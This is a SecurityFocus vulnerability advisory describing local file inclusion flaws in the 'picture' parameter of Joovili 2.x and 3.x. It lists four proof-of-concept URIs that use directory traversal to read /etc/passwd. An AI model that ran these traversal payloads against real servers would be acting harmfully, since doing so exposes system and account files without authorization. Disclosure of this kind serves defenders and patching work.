Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Joovili 'picture' Parameter Multiple Local File Include Vulnerabilities

An attacker can exploit this issue with a browser.

The following proof-of-concept URIs are available:

Joovili 2.x:
http://www.example.com/include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
http://www.example.com/include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

Joovili 3.x:
http://www.example.com/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE http://www.example.com/joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE







 

Privacy Statement
Copyright 2009, SecurityFocus